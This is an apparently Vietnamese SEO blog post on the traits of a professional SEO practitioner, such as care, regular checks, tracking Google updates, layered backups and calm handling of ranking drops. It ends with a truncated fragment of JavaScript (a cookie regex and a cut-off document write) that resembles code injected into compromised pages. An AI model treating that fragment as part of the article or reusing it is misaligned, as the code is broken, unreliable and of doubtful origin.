Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Tố chất của SEO chuyên nghiệp

Tố chất của SEO chuyên nghiệp

SEO nói chung chưa có nhiều người thực sự hiểu rõ, kể cả người dùng lẫn khách hàng. Một sản phẩm dịch vụ nhất là IT luôn có giá trị mơ hồ mà để hiểu cặn kẽ thì phải đào sâu suy nghĩ rất nhiều. SEO không khó, nhưng để lên tầm chuyên nghiệp không phải dễ. Một thời gian làm SEO không ngắn đã cho tôi biết điều đó. Vậy tố chất để làm SEOer chuyên nghiệp là gì, sau đây là một số tố chất mà tôi thấy cần thiết:

SEO Chuyên nghiệp

I- Cẩn thận và tỉ mẩn.

– Trong seo có vô vàn yếu tố ta phải tối ưu, từ on page, off page mỗi yếu tố lại có sự ảnh hưởng thay đổi khác nhau tùy theo sự biến đổi trong thuật toán tìm kiếm của google. Vì thế cần tự xây cho mình một chuẩn chung trong quá trình tối ưu đó để có thể không chế được các yếu tố ảnh hưởng đến việc xếp hạng. Và mọi bài viết, mọi backlinks bạn đặt đều cần tối ưu, với các ngành có cạnh tranh cao thì công việc tối ưu bạn càng cần phải làm nhiều vì thế hãy tỉ mẩn và cẩn thận để tránh phải làm lại toàn bộ.

II- Kiểm tra lại công việc thường xuyên.

– Mọi dự án SEO bạn nhận hoặc điều phối thì không chỉ có mình bạn can thiệp vào hệ thống website mà còn ít nhất hai hoặc nhiều người khác (nhân viên của bạn, khách hàng) chính điều đó đôi khi khiến bạn khó không chế được các yếu tố ảnh hưởng đến SEO.

Ví dụ khách hàng thích post bài viết cho website mà toàn bài viết copy hoặc tự diệt mã độc mà xóa đi sitemap v….v….v thì thật là khổ cho SEOer.

III- Update sự thay đổi của google liên tục.

– Công việc của chúng ta dựa chủ yếu trên hệ thống của Google và chắc chắn chúng ta phải thường xuyên kiểm tra sự thay đổi của google để thích nghi với Google. “Đến hẹn lại lên, google sẽ cập nhật thuật toán”, điều đó khiến nhiều SEOer không hiểu sao thứ hạng từ khóa của mình xuống và lọt ra top 100.

Cách đây 1 tuần vào ngày từ 15 đến 22 google có cập nhật thuật toán mà không công bố thông tin chính thức, làng SEOer lại một phen dậy sóng khi rất nhiều website xuống hạng mà không biết vì sao. Các website SEO tự nhiên lại có thứ hạng ổn định hơn.

IV- Backup và Backup của backup.

– Hãy backup thường xuyên vì có thể trong một ngày đẹp trời, website của bạn sẽ dính mã độc, hoặc host của bạn đang sài Die đột ngột.

– Ổ cứng bạn chết, các bản backup cũng chết theo, và điều xấu nhất là bạn cần backup website ngay chính thời điểm này. Backup của backup là cần thiết, hãy sử dụng Google Driver hoặc SkyDriver hay 1 dịch vụ lưu trữ miễn phí nào đó.

V- Bình tĩnh trước sự cố và giảm thứ hạng bất thường.

– Theo kinh nghiệm của tôi, các sự cố phần lớn là do các plugins hoặc giao diện của website, các sự cố này hoàn toàn không ảnh hưởng đến cơ sở dữ liệu của bạn, Khi găp trường hợp này hãy nhờ người có chuyên môn để khắc phục. Nếu không khắc phục được hãy backup lại bản code web và Theme, các ảnh hoàn toàn có thể backup lại được. Quan trọng nhất lầ cơ sở dữ liệu SQL của bạn vì chúng lưu bài viết và cấu trúc link website của bạn.

– Khi gặp sự giảm thứ hạng đột ngột hay bay ra khỏi top 100 thì đừng lo lắng hãy kiểm tra lại ác yếu tố tối ưu trong website của bạn, và thay đổi chúng hoặc đơn giản là cứ làm tiếp công việc bạn đang làm, từ khóa sẽ lên trở lại.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘